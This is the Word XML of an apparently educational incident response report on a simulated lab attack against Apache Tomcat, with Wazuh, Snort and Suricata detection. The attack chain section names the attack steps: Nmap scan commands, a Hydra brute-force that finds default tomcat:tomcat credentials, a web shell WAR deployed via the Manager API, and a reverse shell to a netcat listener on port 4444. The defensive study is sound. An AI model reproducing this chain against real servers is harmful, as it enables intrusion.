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Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">TRINITY PROJECT  |  JLR — Network Security Event Monitoring &amp; Incident Response</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="40"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t xml:space="preserve">Network Security Event Monitoring</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="20"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t xml:space="preserve">&amp; Incident Response Report</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="50"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="555555"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Security Incident: Credential Theft + Lateral Movement via Apache Tomcat — Lab OT/R&amp;D Boundary</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DAE Cybersecurity &amp; Networking</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Organization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JLR — Jaguar Land Rover (Trinity Project Scenario)</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Incident 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INC-JLR-LAB-2026-0312</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Incident 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Credential Theft + Lateral Movement — OT/R&amp;D Boundary (Simulated)</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P1 — Critical</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Lab Environment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Personal laptop — VirtualBox/VMware  |  pfSense  |  Apache Tomcat  |  Kali Linux  |  Wazuh SIEM</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Detection Tools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Wazuh SIEM  |  pfSense Snort IDS  |  pfSense Suricata IPS  |  pfSense Firewall Logs</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Attack Tools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Kali Linux: Nmap  |  Hydra  |  Metasploit (exploit/multi/handler)  |  curl  |  netcat</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Frameworks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NIST SP 800-61r2  |  ISO/IEC 27035  |  NIST SP 800-53</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Version / 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1.0 Final  |  April 2026</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1. Executive Summary</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="90" w:before="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">This report documents the detection, analysis, and response to a Priority 1 (Critical) simulated security incident executed within the JLR Trinity Project virtual lab environment on 18 March 2026 at 02:41 UTC. The lab environment — a personal laptop running pfSense, Apache Tomcat, Kali Linux, and Wazuh SIEM as VirtualBox/VMware virtual machines — replicates the JLR Coventry Engineering HQ network scenario at small scale, with the same attack chain, the same security control responsibilities, and the same NIST SP 800-61r2 incident response lifecycle.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="90" w:before="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">The simulated incident — designated INC-JLR-LAB-2026-0312 — involved a multi-stage attack launched from the Kali Linux attacker VM against the Apache Tomcat server VM. The attack chain began with credential brute-forcing of the Tomcat Manager interface (simulating the spear-phishing credential theft of the enterprise scenario), progressed to remote code execution via a malicious WAR file deployment (simulating LSASS credential dumping and lateral movement), and concluded with a port scan probe of the protected OT-equivalent network boundary — all blocked by pfSense firewall rules and detected by Wazuh via Snort IDS and Suricata IPS alert feeds.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INCIDENT SUMMARY</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="766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color w:val="000000"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">INC-JLR-LAB-2026-0312  |  P1 Critical  |  Duration: 4h 17m (simulated detection-to-containment timeline)  |  Attack chain: Brute-force &gt; RCE via WAR deploy &gt; Lateral movement probe &gt; OT boundary scan  |  Outcome: CONTAINED — OT-equivalent segment not breached  |  Affected VMs: Apache Tomcat server, pfSense firewall state</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="90" w:before="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">This report fulfills the Trinity Project monitoring and incident response deliverable, providing full documentation of the lab monitoring infrastructure, raw log evidence from Wazuh and pfSense, simulated SIEM alert dashboards, and a step-by-step incident response walkthrough aligned to NIST SP 800-61r2 and ISO/IEC 27035 — adapted throughout to the open-source home lab toolchain.</w:t>
      </w:r>
    </w:p>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2. Lab Context — JLR Scenario Alignment</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="100" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">2.1 Scenario Profile</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="90" w:before="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Jaguar Land Rover (JLR), as defined in the Trinity Project scenario, is a premium automotive OEM with a complex, globally distributed enterprise network spanning engineering design centers, manufacturing facilities, and connected vehicle infrastructure. For this lab implementation, JLR's multi-site network is compressed into four virtual machines on a single host laptop — preserving the attack surface, security zone boundaries, and monitoring obligations of the original scenario while operating within the constraints of a single personal machine.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="90" w:before="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">The core incident scenario remains identical: a threat actor targets a high-value R&amp;D/engineering system (represented by Apache Tomcat hosting a simulated engineering web application), pivots via compromised credentials, and probes the OT/Manufacturing network boundary. The key difference is tooling — enterprise tools (Microsoft Sentinel, CrowdStrike, Darktrace, Palo Alto) are replaced by open-source equivalents (Wazuh, Snort/Suricata via pfSense, pfSense firewall) that implement the same detection and enforcement functions.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="100" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">2.2 Monitored Network Segments — Lab VM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000"/>
        <w:gridCol w:w="1960"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="16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Lab VM / Segment</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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JLR VLAN Equivalent</w:t>
            </w:r>
          </w:p>
        </w:tc>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IP Address</w:t>
            </w:r>
          </w:p>
        </w:tc>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Key Function</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="19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Threat Priority</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VM-1: pfSense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VLAN 60 — SOC/Mgmt + Firewall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192.168.100.1 (LAN GW)</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Hub firewall, IDS/IPS, routing, DHCP/DNS, syslog forwarder</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CRITICAL — single enforcement point</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VM-2: Apache Tomcat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VLAN 20 — R&amp;D / Engineering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192.168.100.10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CUI/R&amp;D-equivalent web app server — Tomcat Manager + deployed app</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CRITICAL — primary target</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="16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VM-3: Kali Linux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External / Untrust (attacker)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192.168.100.50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Simulated APT — Nmap, Hydra, Metasploit, netcat</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UNTRUSTED — attacker origin</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="16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VM-4: Wazuh SIEM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VLAN 60 — SOC / SIEM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192.168.100.20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Centralized SIEM — log ingestion, correlation, alerting, dashboard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CRITICAL — analyst visibility</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="16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pfSense firewall alias: OT-equiv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VLAN 30 — OT/Manufacturing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192.168.100.80/28 (alias)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Blocked segment — simulated OT boundary; deny-all from Tomcat VM enforced by pfSense rule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CRITICAL — OT equivalent</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2.3 Security Monitoring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Lab Tool</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="16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Placement</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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Primary Function</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:t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Wazuh 4.x SIEM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SIEM / Log Correlation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VM-4 — 192.168.100.20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Central log ingestion from pfSense, Snort, Suricata; correlation rules; Level 12 Critical alerting; dashboard</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:t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Snort 3 (pfSense pkg)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IDS — passive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VM-1 pfSense — LAN interface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Passive detection of port scans, brute-force, C2 patterns; alerts forwarded to Wazuh via syslog</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:t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Suricata (pfSense pkg)</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IPS — inline blocking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VM-1 pfSense — LAN interface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Inline blocking of exploit attempts, scan traffic, C2 ports; Kill States on block; EVE JSON to Wazuh</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:t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pfSense Firewall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NGFW equivalent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VM-1 — LAN + WAN interfaces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Stateful firewall rules; deny-all on Tomcat non-app ports; deny-all OT-equivalent segment; full deny logging to Wazuh</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="20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Kali Linux (attacker)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Attacker / Red Team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VM-3 — 192.168.100.50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Attack simulation: Nmap reconnaissance, Hydra credential brute-force, Metasploit WAR deployment, netcat reverse shell, OT port scan</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3. Security Monitoring Architecture and Baseline</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="100" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">3.1 Log Collection and Ingestion Pipeline</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="90" w:before="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">All security-relevant log sources in the lab are ingested into the Wazuh SIEM (192.168.100.20) via a structured syslog pipeline. Wazuh receives logs from pfSense (firewall deny events, DHCP), Snort (passive IDS alerts in Unified2 format), and Suricata (inline IPS alerts in EVE JSON format). The Tomcat VM runs a Wazuh agent that ships Apache access logs and system auth logs directly to the Wazuh manager.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D4F1C0"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">[ WAZUH SIEM — LOG SOURCE INVENTORY  |  JLR LAB SOC  |  192.168.100.20 ]</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4F1C0"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">═══════════════════════════════════════════════════════════════════════</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4F1C0"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">SOURCE              TYPE                  VOLUME (exercise)  STATUS</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4F1C0"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">───────────────────────────────────────────────────────────────────────</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4F1C0"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">pfSense Firewall    Traffic / Deny        ~8,000 events      ACTIVE</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4F1C0"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">Snort IDS           Network alerts        ~1,200 events      ACTIVE</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4F1C0"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">Suricata IPS        Drop / EVE JSON       ~900 events        ACTIVE</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4F1C0"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">Tomcat access.log   HTTP / Auth           ~600 events        ACTIVE (Wazuh agent)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4F1C0"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">Tomcat catalina.log App / Error           ~120 events        ACTIVE (Wazuh agent)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4F1C0"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">Linux auth.log      SSH / sudo            ~80 events         ACTIVE (Wazuh agent)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4F1C0"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">pfSense DHCP        Lease events          ~20 events         ACTIVE</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3.2 Wazuh Correlation Rules Active at Time of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360"/>
        <w:gridCol w:w="1800"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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Rule ID</w:t>
            </w:r>
          </w:p>
        </w:tc>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Rule Name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="33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Trigger Condition</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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Severity</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100441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Multi-source port scan — Kali to Tomcat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Snort SID 9000001 + Suricata SID 9100001 + pfSense deny — same src IP within 60s</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="18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CRITICAL (L12)</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100442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Tomcat brute-force — HTTP 401 storm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&gt;20 HTTP 401 responses from single source IP within 60 seconds (Tomcat access.log)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="18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vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="856404"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">HIGH (L10)</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100443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Tomcat Manager WAR deploy — unauthorized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HTTP POST to /manager/text/deploy detected in Tomcat access.log from non-authorized IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="18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CRITICAL (L12)</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100444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OT boundary probe — scan from Tomcat IP</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pfSense deny log: any traffic from 192.168.100.10 to OT-equiv alias (192.168.100.80/28)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="18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CRITICAL (L12)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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100445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C2 beacon — high-port outbound from Tomcat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Suricata SID 9100003: TCP outbound from 192.168.100.10 to port 4444/1337/8888/31337</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="18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CRITICAL (L12)</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3.3 Established Baseline — Pre-Incident Normal Activity</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="90" w:before="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Prior to INC-JLR-LAB-2026-0312, the following baseline patterns were established for the lab environment during a two-week calibration period. Deviations from this baseline were the primary triggers for Wazuh correlation rule activation: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Metric</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="228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Normal Baseline</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="228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Incident Value</w:t>
            </w:r>
          </w:p>
        </w:tc>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Delta</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HTTP requests to Tomcat /manager</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0–2 per hour (admin only)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847 in 4 minutes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="20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+42,000%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HTTP 401 auth failures (Tomcat)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0–3 per day</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312 in 90 seconds</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="20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ANOMALOUS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Outbound connections from Tomcat VM</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0 (server — no outbound)</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 (TCP/4444 to Kali VM)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="20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pfSense deny events to OT-equiv alias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0 (blocked segment — no traffic)</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3 SYN packets from Tomcat IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="20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CRITICAL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Nmap SYN packets from Kali VM</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0 (no authorized scanning)</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65,535 SYN packets (full port scan)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="20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ANOMALOUS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WAR file deployment events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0 per week (no active deployments)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 (shell.war deployed via Manager)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="20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CRITICAL</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4. Security Incident Identification — INC-JLR-LAB-2026-0312</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="100" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">4.1 Incident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INCIDENT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="766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color w:val="000000"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">INC-JLR-LAB-2026-0312  |  P1 CRITICAL  |  18 March 2026 02:41 UTC  |  Credential Brute-Force + RCE + OT Boundary Probe  |  Status: CLOSED / CONTAINED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Incident ID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INC-JLR-LAB-2026-0312</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Priority / Severity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P1 — Critical (NIST SP 800-61r2 Category: Unauthorized Access + Malicious Code)</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Detection Time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2026-03-18T02:41:07Z (Wazuh rule 100441: multi-source Snort + Suricata + pfSense deny correlation)</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Containment Time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2026-03-18T06:58:22Z (4 hours 17 minutes from detection to full containment)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Attack Source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VM-3: Kali Linux — 192.168.100.50 (simulated external attacker)</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Affected Host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VM-2: Apache Tomcat — 192.168.100.10 (CUI/R&amp;D-equivalent target)</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Attack Vector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Hydra brute-force of Tomcat Manager &gt; Malicious WAR deployment (shell.war) &gt; Reverse shell (TCP/4444) &gt; OT-equiv boundary probe (Nmap -p 102)</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Attempted Target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pfSense OT-equiv alias (192.168.100.80/28) — NOT BREACHED (pfSense deny-all rule held)</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Data at Risk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Apache Tomcat web application files and configuration — access confirmed, no confirmed exfil</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="24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Incident Handler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Lab analyst (Wazuh dashboard) — simulating JLR SOC Tier 2 + IR Lead</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4.2 Attack Chain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c>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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Stage</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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Time (UTC)</w:t>
            </w:r>
          </w:p>
        </w:tc>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Activity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="39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Evidence Source</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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1 — Recon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02:03:14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Kali launches Nmap -sS -sV -p- 192.168.100.10 — full port SYN scan of Tomcat VM</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Snort SID 9000001 alert; pfSense deny log on non-app ports; Wazuh rule 100441 fires</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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2 — Brute-Force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02:11:52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Hydra brute-forces Tomcat Manager (http-form-post /manager/html) — 312 failed auth attempts before successful login with weak credential tomcat:tomcat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Tomcat access.log: 312x HTTP 401 then HTTP 200; Wazuh rule 100442 (brute-force storm); Snort SID 9000005</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="12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3 — Initial Access / RCE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02:17:33</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Kali deploys shell.war via Tomcat Manager API (curl POST /manager/text/deploy) — JSP web shell deployed as /shell/cmd.jsp</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Tomcat access.log: POST /manager/text/deploy HTTP 200; catalina.log: INFO Deployment of shell.war; Wazuh rule 100443 CRITICAL</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="12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4 — C2 / Reverse Shell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02:28:47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JSP shell executes bash reverse shell payload — TCP/4444 outbound connection from Tomcat VM (192.168.100.10) to Kali netcat listener (192.168.100.50:4444)</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Suricata SID 9100003 DROP (C2 port 4444) + Wazuh rule 100445; pfSense deny log on outbound 4444; Kill States activated</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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5 — Discovery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02:33:19</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From reverse shell, attacker runs ifconfig, netstat -rn, nmap -sn 192.168.100.0/24 — internal network discovery from Tomcat VM</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Snort SID 9000001 (internal scan from Tomcat IP); Wazuh agent on Tomcat: bash command history; pfSense DHCP log</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="12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6 — OT Probe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02:40:51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Attacker scans OT-equiv alias: nmap -p 102 192.168.100.80/28 from Tomcat shell — 3 SYN packets to 192.168.100.80 port 102 (simulated Siemens S7)</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pfSense DENY log: rule DENY-TOMCAT-TO-OT-EQUIV; Wazuh rule 100444 CRITICAL; Suricata SID 9100004</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="12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left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="155724"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">7 — Detection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02:41:07</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Wazuh rule 100441 correlates Snort + Suricata + pfSense deny events from same source — Level 12 Critical alert generated; analyst email notification fired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Wazuh SIEM: INC-JLR-LAB-2026-0312 created; L12 alert dashboard; email alert to analyst</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="12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left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="155724"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
